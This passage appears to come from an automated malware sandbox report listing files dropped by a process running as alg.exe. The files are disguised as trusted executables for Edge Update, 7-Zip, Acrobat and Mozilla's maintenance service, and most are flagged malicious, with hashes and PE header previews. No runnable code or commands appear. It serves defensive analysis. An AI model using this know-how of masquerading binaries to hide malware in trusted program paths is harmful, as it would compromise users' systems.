SSDEEP:	12288:U4lssmroCnXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:Ucssmr1sqjnhMgeiCl7G0nehbGZpbD
MD5:	0A56A75DC4A9C3A85DD0DC36762C3B2B
SHA1:	EFFF3CCDB831A099134862A1FA07E1D748E642FA
SHA-256:	2B0CA363CCA56A8BB6B03AE130BFE912F3FA1AB8C85B56F4753EBF1FFBA0D7F8
SHA-512:	BFC8FCFBF8782BA4A1FB3E1AF419CFCC92185ADDCC308393560BD9066237447860D137E433ECB551675E074AD41915EA4B39D4C2AD5DF1A5B6B9EB642E75845A
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............O.@.O.@.O.@.$.A.O.@.$.A\|O.@.7.A.O.@.7.A.O.@.7.A.O.@W6.A.O.@.$.A.O.@.$.A.O.@.$.A.O.@.O.@IN.@W6.A.O.@W6.@.O.@W6.A.O.@Rich.O.@........PE..d...@(.d.........."......n...........].........@....................................u..... .....................................................(............@..........................p.......................(...p,..@...............0............................text....l.......n.................. ..`.rdata..8z.......\|...r..............@..@.data...P3..........................@....pdata.......@......................@..@.didat.......`......................@..._RDATA.......p......................@..@.rsrc...............................@..@.reloc...P.......@... ..............@...........................................................................................................................................................

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1383936
Entropy (8bit):	5.338525272049943
Encrypted:	false
SSDEEP:	24576:603cT++foSBWU2YxhkgOsqjnhMgeiCl7G0nehbGZpbD:x3cK+foQWU2YnPiDmg27RnWGj
MD5:	37AF76FB2C5611E8903A08DD450101C3
SHA1:	D93196A04B61D2BD5EC21FBE46276D85E6628577
SHA-256:	9024CF6095E4601CCF5C206ECDCC5C5C9CCFB4A1A9DB80BC0246A0CABF22EC79
SHA-512:	39031BB77EBE8262DD5B1992A35661A43DB21A82A7F3D7FE73D00FE975991CE38222BCEA42D9D96B008AC63307770025B097279043062CE73082E86DEDC09FC9
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............wU..wU..wU.tT..wU.rTg.wU..sT..wU..tT..wU..rT..wU.sT..wU.qT..wU.vT..wU..vUQ.wUK.~T..wUK..U..wUK.uT..wURich..wU........PE..L...B(.d............................p.............@..........................................................................y..........H3...........................g..p....................g..........@....................x.......................text............................... ..`.rdata...z.......\|..................@..@.data....'...........z..............@....didat..$...........................@....rsrc...H3.......4..................@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1221120
Entropy (8bit):	5.138909462033153
Encrypted:	false
SSDEEP:	12288:bbrNRzB+NuXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:bbBRzBgusqjnhMgeiCl7G0nehbGZpbD
MD5:	05FEA7F012FE63FD353FF6527DD0537C
SHA1:	ED4FB7CE31BC78496589EB0D7C364243545DE6A9
SHA-256:	5DC16A037313C603DB9E6F0DD8B3BD6DE4245B807AB13E47473C2C6E7B785B92
SHA-512:	8716A83EC4D2AC34C0F6DC3B71A53BE90414D24FC401926E8F76D767EF371CFB252231A8A3F33971B171A6833CD6DEC6F3D4512953FEBBB2C94CECCC23D61609
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...7(.d..........................................@.............................................................................(....`..X3..............................p...............................@...................<...@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...`.......P...R..............@...................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2168832
Entropy (8bit):	7.940559083886755
Encrypted:	false
SSDEEP:	49152:Fy53w24gQu3TPZ2psFkiSqwozADmg27RnWGj:FyFQgZqsFki+ozAD527BWG
MD5:	44DC8219DD43D067C85762ECB2F4112B
SHA1:	A6C32384BDA592A705C3A585A008557CDCD7B87E
SHA-256:	051A2E6459F586103ED36EC7703EC2244009C96EC9683399EB9EAC47BD725533
SHA-512:	32D877F0B85CDDE6B6EA2FC74E4505F5E5E6EB1EC976C61AC034A9F1B08DCFC4CF50BC46C8F9186043CA849AB5A85CAA8A1AAF7DBAE9156C9012A8D67FE1D7DB
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d..[ e.. e.. e..4...+e..4....e..B...1e..B...4e......-e..B....e..4...3e..4...!e..4...-e.. e...e....@.!e.. e(.ve......!e..Rich e..................PE..L....(.d............................ }............@..........................p!......c!......................................?..x....................................1..p....................1..........@...............H...T>..`....................text...*........................... ..`.rdata..............................@..@.data...,....P.......8..............@....didat..,....p.......B..............@....rsrc................D..............@..@.reloc.......p.......(..............@...................................................................................................................................................................................................................................................

C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log

Download File

Process:	C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3141
Entropy (8bit):	4.800571873155222
Encrypted:	false
SSDEEP:	24:xdQjGRKWtsWmIN13WqrOoWlbMW079pWqN6mAWcv+lzgMJW0a:xEGR9hmCUGO/N7q0mHnUD
MD5:	2A30F1E878FAA2F29A0DFA527551EB7A
SHA1:	36A809635F1027E745A61F6A9F333A9E8C8DE205
SHA-256:	063C068CD0E7D599A2A7DE11BC55E1156A2B52B2DE70B9D0C1A58C782AE3CFF7
SHA-512:	C02EC0720BC11D5E982470B81209DB3FCEDE861A36C8F1809C5D5332E6D4290DACE97388C22210A388F9B3759A62239C17B8C647E3B0AEE14C6547184A5939FE
Malicious:	false
Reputation:	unknown
Preview:	2025-01-10 10:01:37-0500: Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...2025-01-10 10:01:37-0500: Disabled unneeded token privilege: SeAuditPrivilege...2025-01-10 10:01:37-0500: Disabled unneeded token privilege: SeBackupPrivilege...2025-01-10 10:01:37-0500: Disabled unneeded token privilege: SeCreateGlobalPrivilege...2025-01-10 10:01:37-0500: Disabled unneeded token privilege: SeCreatePagefilePrivilege...2025-01-10 10:01:37-0500: Disabled unneeded token privilege: SeCreatePermanentPrivilege...2025-01-10 10:01:37-0500: Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...2025-01-10 10:01:37-0500: Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..2025-01-10 10:01:37-0500: Disabled unneeded token privilege: SeDebugPrivilege...2025-01-10 10:01:37-0500: Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..2025-01-10 10:01:37-0500: Disabled unneeded token privilege: SeImpersonatePrivilege...2025-01-10 10:01:3

C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1356800
Entropy (8bit):	5.347824972791589
Encrypted:	false
SSDEEP:	24576:vQVTZu0JpsqjnhMgeiCl7G0nehbGZpbD:YVTZu4Dmg27RnWGj
MD5:	1ACA52915DC5A84234E34BB426FEF8DF
SHA1:	C7DEFD3B8114D2F1002F0460BE3860C2C0C6043C
SHA-256:	859D81B5D8FA5FDC2EBD61C044C63DFDB554CF38ADEAEC6BFBA4676E151DE544
SHA-512:	DF0CB426EB5ACFA396F29E298109A41C54859E74F392AC1E60EB044BC1F3E493A18E29D5DE1E9C0C4B5519A3D694452D37A35B7E28B601D912CF22DF836081E2
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................P............ .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...P.......@...t..............@...........................................................................................................................................................................................................................

C:\Program Files\7-Zip\7z.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1683968
Entropy (8bit):	5.6231183567445235
Encrypted:	false
SSDEEP:	24576:m+gkESfh4CoGsqjnhMgeiCl7G0nehbGZpbD:bgkE+SUDmg27RnWGj
MD5:	F7BF775D875E14463EE4EC2D88D9FE9C
SHA1:	2F4C1F051E0B4AD074A57FD2F35E21B9F11D2001
SHA-256:	57FC9ABEC511A586DC35D951688F1EAE13F7CF2FAE4CF19E3B49758BA4DF3D9E
SHA-512:	289A1D7E44754BFA8A39FC974A66DF75102AB37A4215505FA1150B67CE20957B3BEB475068836D17F68A9EE0C025C124D6A74FA894CFAA0A0CF10A9677EFD7B8
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............xaX.xaX.xaX...X.xaX...X.xaX.x`XlxaX...X.xaX..eY.xaX...X.xaX`.bY.xaX...X.xaX...X.xaXRich.xaX........................PE..d....\.d.........."...........................@.............................. ......i..... .....................................................x............@...q......................................................................0............................text...v........................... ..`.rdata..T...........................@..@.data....-..........................@....pdata...q...@...r..................@..@.rsrc................j..............@..@.reloc...P.......@...r..............@...........................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\7zFM.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1532416
Entropy (8bit):	7.096653089209757
Encrypted:	false
SSDEEP:	24576:WBpDRmi78gkPXlyo0GtjrhsqjnhMgeiCl7G0nehbGZpbD:SNRmi78gkPX4o0GtjJDmg27RnWGj
MD5:	E06DA3579F2B4F1771CDEEB482B89CE7
SHA1:	A445B47D6445460E0E3DF7988CA650342A3ACB88
SHA-256:	53E638820595BB26F3AC8E5736B3BB9555F473FB659EEB4E54F4CE310B1C6E37
SHA-512:	5F729611B2E44ED0B37367A82D6547E5D559674C12A51AA0829509A6C76970706799EC976E79D3368544E84B6980E8C0FEB93F8D42CFD1E4CF9C466F3BED40A3
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\..2..2..2.0.\..2..I..2..3..2..O..2..\.D.2...6..2.._..2..N..2..J..2.Rich.2.........................PE..d....\.d.........."......b...8......Pi........@........................................... .................................................P................... .......................................................................(.......@....................text....a.......b.................. ..`.rdata...i.......j...f..............@..@.data...............................@....pdata.. ...........................@..@.rsrc...............................@..@.reloc...............r..............@...........................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\7zG.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1282048
Entropy (8bit):	7.2290449935942585
Encrypted:	false
SSDEEP:	24576:7LOS2oTPIXVGsqjnhMgeiCl7G0nehbGZpbD:l/TRDmg27RnWGj
MD5:	F548CA7CDD534A073EAD31C1E5CD41A1
SHA1:	430ED456517B615DE552866A53769A0E50C782BE
SHA-256:	097DBC24C8C6995D603AC5381619C9671F5F1602BD4E60E91C005092D7085B05
SHA-512:	5BBEF231FC6A1A3CFA1E24A2D38AD0B483BD7DBCCC97B5F774D50EDA17763B969F58493D9FCEEF94283503C8010177839A03DA4D49AE4F214A97D8AD1E283AF8
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.VS.y8..y8..y8...C.jy8..y9..y8...E.}y8...V..y8.i.<.~y8...U.ky8...;.~y8...D.~y8...@.~y8.Rich.y8.........PE..d....\.d.........."......&..........."........@.....................................we.... ..............................................................d...........................................................................@...............................text...4$.......&.................. ..`.rdata..Ts...@...t...*..............@..@.data...83..........................@....pdata..............................@..@.rsrc....d.......f...:..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\Uninstall.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1145344
Entropy (8bit):	5.0311929809222455
Encrypted:	false
SSDEEP:	12288:E1IXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:E1IsqjnhMgeiCl7G0nehbGZpbD
MD5:	E41BF84886F1384A77C2422C504DCFC9
SHA1:	B88D42866C0CB39F23AD8A056117BBB6AD2936B8
SHA-256:	7E9EF4909160074B9F7464F9BE4D81EE4D615DE7EB68031419F7F3FD4370328D
SHA-512:	99BB2232EE881C633099849A888A49EAD8974AA6A49608B943CA0BF8AABBE766A13D8C3B411383E08A547565BE6DCF8FBDED39C29A5645210ECD65D33498F817
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../..........@......f!.......0....@..................................W......................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc....`...`...P...*..............@...........................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1222656
Entropy (8bit):	6.712019854135017
Encrypted:	false
SSDEEP:	12288:zRudzjXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:zAdzjsqjnhMgeiCl7G0nehbGZpbD
MD5:	BA78F6D555F1F93637D3D98E1D475BE1
SHA1:	7550361762FB923161ACF444536C2B56CA45805B
SHA-256:	6C1DB0771AAB4F2A17222CCD72CD98106D4CF189E65BC56D54C31F4CBB2B9873
SHA-512:	1FDFB55E8DAE1DD987F97EF3791BC818144E4EA43E00C6202C34532032981546392CE7CAAEE1B6D4981F18E826FB8D45F67AC15EBF7A04D1C2C289C6C09247CA
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4.F.4.F.4.F.LEF.4.FE@.G.4.FE@.G.4.FE@.G.4.FE@.G.4.F._.G.4.F.4.F%4.FG@.G.4.FG@)F.4.F.4AF.4.FG@.G.4.FRich.4.F................PE..d......d.........."......6.....................@.......................................... .....................................................\|....P..h........9.....................p.......................(...P...8............P...............................text....4.......6.................. ..`.rdata..>....P.......:..............@..@.data...............................@....pdata...9.......:..................@..@.rsrc...h....P......................@..@.reloc..............................@...................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1457664
Entropy (8bit):	5.0821576264138635
Encrypted:	false
SSDEEP:	12288:1vPXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:5sqjnhMgeiCl7G0nehbGZpbD
MD5:	07F3F25CC1BE76BCF7FF93AF996F4249
SHA1:	BABC1AAFC801A093EA92790C4D5DF77CB9D383D5
SHA-256:	97ABD3656F1DF06F987EDA9A93D125B87ED97FAAE8DD264885DC487CDC234D08
SHA-512:	8C926FA51475BA78B179AFD66245D6F5A0FC8C502C5CD2711FD60D9711DA155AEACFE889179929D972EBD27ACA80E28F32C7DF374D264EB563D0DEF97B690FAB
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......]../...\|...\|...\|B..}...\|B..}...\|...}...\|..S\|...\|..}=..\|..}...\|..}...\|..}...\|..=\|...\|o..\|...\|B..}...\|...\|...\|..}...\|..Q\|...\|..9\|...\|..}...\|Rich...\|................PE..d......d.........."......H...........&.........@.......................................... .................................................@...,....@..........4......................T.......................(...@...8............`...............................text....G.......H.................. ..`.rdata.......`.......L..............@..@.data...............................@....pdata..4...........................@..@.CRT....@....0......................@..@.rsrc........@......................@..@.reloc...P...P...@..................@...................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1461248
Entropy (8bit):	5.468619877775629
Encrypted:	false
SSDEEP:	24576:b5zhM1XSEqsqjnhMgeiCl7G0nehbGZpbD:vMsnDmg27RnWGj
MD5:	5EC8EEC019F81B92444824839B9E61C5
SHA1:	47A98853BA6AF69E2A0B650115479E5D979CBA9E
SHA-256:	33B7683DECF0176A691C05FB4BC60ED7C517B53EE7511BB6D6AEF3968C5B0EE8
SHA-512:	BC777DF6EF676F88E40E7BB738CE9C62A2480383E03F91044F8E102B410873E7832463948E9A01E9F5B8AE632234BE6F3CA9913CCB6770A773263D78CCE75A36
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........<$.Rw.Rw.Rw...w..Rw5.Vv.Rw5.Qv.Rw5.Sv.Rw7.Sv.Rw..Vv.Rw..Tv.Rw..Sv..Rw.Sw..Rw5.Wv.Rw.t/w.Rw.t?w..Rw7.Wv.Rw7.Vv.Rw7.w.Rw..w.Rw7.Pv.RwRich.Rw........PE..d......d.........."..........z......@..........@.......................................... ................................................. A...................+......................T.......................(.......8............................................text............................... ..`.rdata..............................@..@.data....d...`...\...T..............@....pdata...+.......,..................@..@.rsrc............0..................@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4151808
Entropy (8bit):	6.499779748361722
Encrypted:	false
SSDEEP:	49152:FtuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755NDmg27RN:FjEIa4HIEWOc5LD527BWG
MD5:	2E34907C63BCCD09E18751EC8423700D
SHA1:	942A8300AAD12EE177C32C30CBE3401724216DA3
SHA-256:	0D83B529D558FE00B85D8F02432CE399DD03B36CD62EFE47387E76C2F95E8C2A
SHA-512:	59EF5C2799CCC3126F31AB01E85B422FE47FB26DA8F7B1A45395B618841B02C839DE574D8F87091491E9E53DFDE3D46D0CA32F90326C87DCE35371F2CF75ED27
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @.....mc?... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	59941376
Entropy (8bit):	7.99936730785708
Encrypted:	true
SSDEEP:	1572864:hQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:SXhwMhe6AABPiQwF6xQ22R
MD5:	C1C64279868C02E7A42AB315A1FBD126
SHA1:	C3013377554468A1E5577C30541ED51CDB2B74EB
SHA-256:	FF5CFCA5653FC0120AC0C52D988E69FAFD860A089E7F47FB91391488B29AE2C3
SHA-512:	3595F0FCBE57BCDFC35F7770E11451BFDE4460770AD051F8CBA8509D8999DB98D4A7F88A850117E010F9BAA8C338D332E124F844BB17999718502862310152CE
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0............ .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1180160
Entropy (8bit):	5.084801338532377
Encrypted:	false
SSDEEP:	12288:PW/Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:PasqjnhMgeiCl7G0nehbGZpbD
MD5:	CDD27290312E02FC7704270026863EBD
SHA1:	A45CA1C7F5AB6124F43CFCEE6116501C446F9810
SHA-256:	A4977237BAE08C8D0CE46494FB2A4A19C035BDFF8D04F2179593235D9EBF5E47
SHA-512:	0BB84D4FF26E65B30857B41B1BA52AF2857C140DB3C9E262EADC77F0219A8AEC6103F1614CEEDC9E510361E63B97AF5E3CA48411DCF8594363DC9815C15F6EF0
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e....b..b..b.\|...b.epf..b.epa..b.epg..b.epc..b.oc..b..c.2.b.gpg..b.gp...b.....b.gp`..b.Rich..b.................PE..d...R..d.........."......l...Z.......m.........@.............................@.......w.... .....................................................\|.......p.......@.......................T.......................(.......8............................................text...>k.......l.................. ..`.rdata..J:.......<...p..............@..@.data...............................@....pdata..@...........................@..@.rsrc...p...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6210048
Entropy (8bit):	6.386704131266631
Encrypted:	false
SSDEEP:	49152:HDvZEaFVUn+Dpasot2xQevgjCGT7lmPIionqOgBhGl6zVLkVEk3yV07U24GEQTX9:QnN9KfxLk6GEQTX5UKzND8D527BWG
MD5:	63B2C50F0AB9194B172FF9B11A00E260
SHA1:	60D0CE6F71F5710FBF9C3E9C9D8A82634008E917
SHA-256:	6867E25BEBF863FD1280338F3511CC10CC4A5793DB4C674A2DA5C4059A27B554
SHA-512:	16D88AA40B218334DEA6F65E8154996886DBCF9D5EE8A3F6BB864FD45DCF171E81C55C408CC96E73AE8157BF077856529BD09EA0C58D9176C5BFB334F06BFA94
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......;..j...9...9...9k..8r..9k..8...9...8l..9...8t..9..p9\|..9...9...9...8...9k..8\..9k..8}..9k..8n..9...9...9...8Y..9...8~..9..r9~..9...9\|..9...8~..9Rich...9........................PE..d......d.........."......V4..,"......L(........@.............................._.....\.^... ..........................................<F.\|....EF.x....0K..V...@H......................n;.T....................o;.(....:.8............p4..... .F.`....................text...,T4......V4................. ..`.rdata..@....p4......Z4.............@..@.data...l.....F......nF.............@....pdata.......@H......vG.............@..@.didat.. .....K......>J.............@..._RDATA....... K......HJ.............@..@.rsrc....V...0K..X...JJ.............@..@.reloc...0....V.. ....U.............@...................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1157120
Entropy (8bit):	5.041474103760916
Encrypted:	false
SSDEEP:	12288:+yXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:+ysqjnhMgeiCl7G0nehbGZpbD
MD5:	1DF3AC357317DFFE46B8D9C1652FD56D
SHA1:	660BE63D9C2A4553C4EABD1AF8C5141152F4028C
SHA-256:	4F65774A92D888BA1C923235B927B348870C11BD9373216C4A91D911512562BA
SHA-512:	A412242918C14F6B4DC93027727566B47471161657FC5F65E0FC674838C4C275FEE4027EF6EE9D580F45C7440F0760EF2C6A6AD5BDFBF6134407DD315B7EEC9B
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.tKx...x...x...q..t.......c.......r.......{.......~...l...}...x...........\|.......y...x...y.......y...Richx...................PE..d......d.........."..........>.......0.........@.....................................j.... .................................................lV..........h...........................PI..T....................K..(....I..8............@...............................text....,.......................... ..`.rdata..4"...@...$...2..............@..@.data........p.......V..............@....pdata...............X..............@..@.rsrc...h............\..............@..@.reloc...P.......@...h..............@...................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12039168
Entropy (8bit):	6.596676680234605
Encrypted:	false
SSDEEP:	98304:Sb+MzPstUEHInwZk3RBk9DdhgJCudq1uVIyESYgK9D527BWG:UnPgTHIwZoRBk9DdhSUEVIXgK9VQBWG
MD5:	76395B3ED0BFA37902E9A1DCF2BDDC9F
SHA1:	904DC4DE067E92726722511CFBE5B1641F448BF4
SHA-256:	7C1FB54AF7805174FB28F32F21478E6B4AB3E6B52E5CBB534EC9B36479C6EB4B
SHA-512:	77F9854FFC39E7424F9EAB55E3FFECCE4464F83F2BDC1C8062A97542A209847C98EDB67AAFC26A904EAA63A7522E14A1A4A69ECCAE69C659EE834CF61D556D8A
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......&.w.bb..bb..bb..v...lb..v...b.....qb.....hb......ab......b..E.t.Vb..E.d.jb.....ib......b..v...\|b..v...cb.....`..bb..}b..v...Ab..bb..,`.....b.....cb.....cb..bb..`b.....cb..Richbb..........PE..d......d..........".........../.....0.F........@.......................................... ............................................\...,..h........G......Lz..................P..T......................(......8...........................................text............................... ..`.rdata..f. .......!.................@..@.data..............................@....pdata..Lz.......\|.................@..@.didat...............X..............@..._RDATA...............Z..............@..@.rsrc....G.......H...\..............@..@.reloc... .........................@...........................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1322496
Entropy (8bit):	5.281811696925469
Encrypted:	false
SSDEEP:	24576:Bg5FvCPusJsqjnhMgeiCl7G0nehbGZpbD:WftaDmg27RnWGj
MD5:	761BEA369BB52A748406F8A51DD6B71D
SHA1:	5AF6A5B1990C92DE17120CD0B57D82D1385BAA6B
SHA-256:	39207261A4A5069CCBFE08C0CF9F6DB4FF9406D5A4889E9E43040A6F673C3180
SHA-512:	69C0371A93EEA7EAA9201BC22C4C81716583D930B3A8334FDCE50C3E16E21F494AC45BDF3895B88B7DCDF59C257E519B3683BD1F200EB1DEB8B97B6ED6D30132
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ z.A...A...A...9...A..O5...A..O5...A..O5...A..O5...A...*...A...A...@..M5...A..M5.A...A...A..M5...A..Rich.A..................PE..d......d.........."..........b.................@.............................p............ .................................................X...h....p..p....P..t.......................T.......................(.......8............................................text...,........................... ..`.rdata.............................@..@.data........@.......&..............@....pdata..t....P......................@..@.rsrc...p....p.......B..............@..@.reloc...P... ...@..................@...................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1339904
Entropy (8bit):	7.208890641006114
Encrypted:	false
SSDEEP:	24576:3jKTIsAjFuvtIfmFthMaT5U8aChaeuLsqjnhMgeiCl7G0nehbGZpbD:3jIMmPh7TT79yDmg27RnWGj
MD5:	2E617730E38DD5E3BE507C0FCD33F6B9
SHA1:	7E2535F091B80FACEEF6322655506622248EF0AB
SHA-256:	CC30B4A8CE9194624581F6A07D79CE58A471AF5C33EBBA92F3074316DA485A6C
SHA-512:	C772F6D3533AE99A0CF683D1FCDA41D8870D04EFE5B33E1A5A9358FB5D230C801472ECCEDD1272296E80782BF66586932A01252B9AC5B9707BAC3575B1C894F0
Malicious:	true
Reputation:	unknown
